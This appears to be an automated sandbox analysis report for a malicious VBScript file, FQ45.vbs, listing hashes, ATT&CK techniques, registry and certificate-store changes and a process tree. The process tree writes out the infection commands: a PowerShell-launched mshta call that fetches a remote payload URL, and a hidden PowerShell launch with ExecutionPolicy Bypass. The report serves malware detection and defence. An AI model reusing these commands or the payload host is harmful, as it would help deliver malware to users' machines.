e5ddae23eb8d248fb190371808ab28d20485a16f2eb0fc238a1fb812f3c52c91

General

Target

FQ45.vbs
Size

996B
MD5

7c5cdd80461494fe18eae20726676f01
SHA1

9d4ba6a01448c36043854f6a13a5922480c6a26f
SHA256

e5ddae23eb8d248fb190371808ab28d20485a16f2eb0fc238a1fb812f3c52c91
SHA512

9c54062fd3cc99467613562bac1dc29b477492c3ce8b07a1c289c1c4099a036ddcd00c5a0992244d17afda0ee9cb4d308a022c7d4993e64423a46470af64e93c

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

7 1460 mshta.exe
9 1460 mshta.exe
11 1460 mshta.exe
Drops startup file 1 IoCs

Processes:

WScript.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FQ45.vbs WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

flow	pid	process
7	1460	mshta.exe
9	1460	mshta.exe
11	1460	mshta.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FQ45.vbs	WScript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1192 powershell.exe
1192 powershell.exe
404 powershell.exe
404 powershell.exe
1660 powershell.exe
1660 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1192 powershell.exe
Token: SeDebugPrivilege 404 powershell.exe
Token: SeDebugPrivilege 1660 powershell.exe

pid	process
1192	powershell.exe
1192	powershell.exe
404	powershell.exe
404	powershell.exe
1660	powershell.exe
1660	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.exemshta.exe

description	pid	process	target process
PID 1596 wrote to memory of 1192	1596	WScript.exe	powershell.exe
PID 1596 wrote to memory of 1192	1596	WScript.exe	powershell.exe
PID 1596 wrote to memory of 1192	1596	WScript.exe	powershell.exe
PID 1192 wrote to memory of 1460	1192	powershell.exe	mshta.exe
PID 1192 wrote to memory of 1460	1192	powershell.exe	mshta.exe
PID 1192 wrote to memory of 1460	1192	powershell.exe	mshta.exe
PID 1596 wrote to memory of 404	1596	WScript.exe	powershell.exe
PID 1596 wrote to memory of 404	1596	WScript.exe	powershell.exe
PID 1596 wrote to memory of 404	1596	WScript.exe	powershell.exe
PID 1460 wrote to memory of 1660	1460	mshta.exe	powershell.exe
PID 1460 wrote to memory of 1660	1460	mshta.exe	powershell.exe
PID 1460 wrote to memory of 1660	1460	mshta.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FQ45.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\mshta https://pazpus.com/bootstrap/cache/zender.txt
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://pazpus.com/bootstrap/cache/zender.txt
3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6062e5ec45f167c36916f7a8a427aa6d

SHA1
22250efb0e8d103033d88cf68f4e0dbeacc5ae57

SHA256
9fee206afd89be4a43061f329444f0b1e1337efec1780b7596dff669257a9536

SHA512
5ecb7820d2027cf04ec6a6da8629c238affc6926ba357e795e04d7ef6ac15efab281c83d59aa664beca9522b585134ad0c8a94db36d42c1d82266b98b172aa22

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6062e5ec45f167c36916f7a8a427aa6d

SHA1
22250efb0e8d103033d88cf68f4e0dbeacc5ae57

SHA256
9fee206afd89be4a43061f329444f0b1e1337efec1780b7596dff669257a9536

SHA512
5ecb7820d2027cf04ec6a6da8629c238affc6926ba357e795e04d7ef6ac15efab281c83d59aa664beca9522b585134ad0c8a94db36d42c1d82266b98b172aa22

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/404-41-0x000000001AA20000-0x000000001AA21000-memory.dmp

Filesize
4KB

Download
memory/404-17-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

Filesize
9.9MB

Download
memory/404-40-0x000000001AA10000-0x000000001AA11000-memory.dmp

Filesize
4KB

Download
memory/404-28-0x000000001AAE0000-0x000000001AAE1000-memory.dmp

Filesize
4KB

Download
memory/404-25-0x000000001AAB0000-0x000000001AAB1000-memory.dmp

Filesize
4KB

Download
memory/404-24-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/404-23-0x000000001AB24000-0x000000001AB26000-memory.dmp

Filesize
8KB

Download
memory/404-22-0x000000001AB20000-0x000000001AB22000-memory.dmp

Filesize
8KB

Download
memory/404-14-0x0000000000000000-mapping.dmp

Download
memory/404-50-0x000000001AB2A000-0x000000001AB49000-memory.dmp

Filesize
124KB

Download
memory/404-21-0x000000001A9C0000-0x000000001A9C1000-memory.dmp

Filesize
4KB

Download
memory/404-19-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

Filesize
4KB

Download
memory/404-18-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/580-13-0x000007FEF7540000-0x000007FEF77BA000-memory.dmp

Filesize
2.5MB

Download
memory/1192-11-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/1192-7-0x00000000026B0000-0x00000000026B2000-memory.dmp

Filesize
8KB

Download
memory/1192-3-0x0000000000000000-mapping.dmp

Download
memory/1192-5-0x000007FEF5480000-0x000007FEF5E6C000-memory.dmp

Filesize
9.9MB

Download
memory/1192-10-0x0000000002660000-0x0000000002661000-memory.dmp

Filesize
4KB

Download
memory/1192-8-0x000000001AA90000-0x000000001AA91000-memory.dmp

Filesize
4KB

Download
memory/1192-9-0x00000000026B4000-0x00000000026B6000-memory.dmp

Filesize
8KB

Download
memory/1192-6-0x0000000002480000-0x0000000002481000-memory.dmp

Filesize
4KB

Download
memory/1460-12-0x0000000000000000-mapping.dmp

Download
memory/1596-20-0x0000000002500000-0x0000000002504000-memory.dmp

Filesize
16KB

Download
memory/1596-2-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp

Filesize
8KB

Download
memory/1660-42-0x0000000000000000-mapping.dmp

Download
memory/1660-46-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

Filesize
9.9MB

Download
memory/1660-49-0x000000001ACE0000-0x000000001ACE2000-memory.dmp

Filesize
8KB

Download
memory/1660-51-0x000000001ACE4000-0x000000001ACE6000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing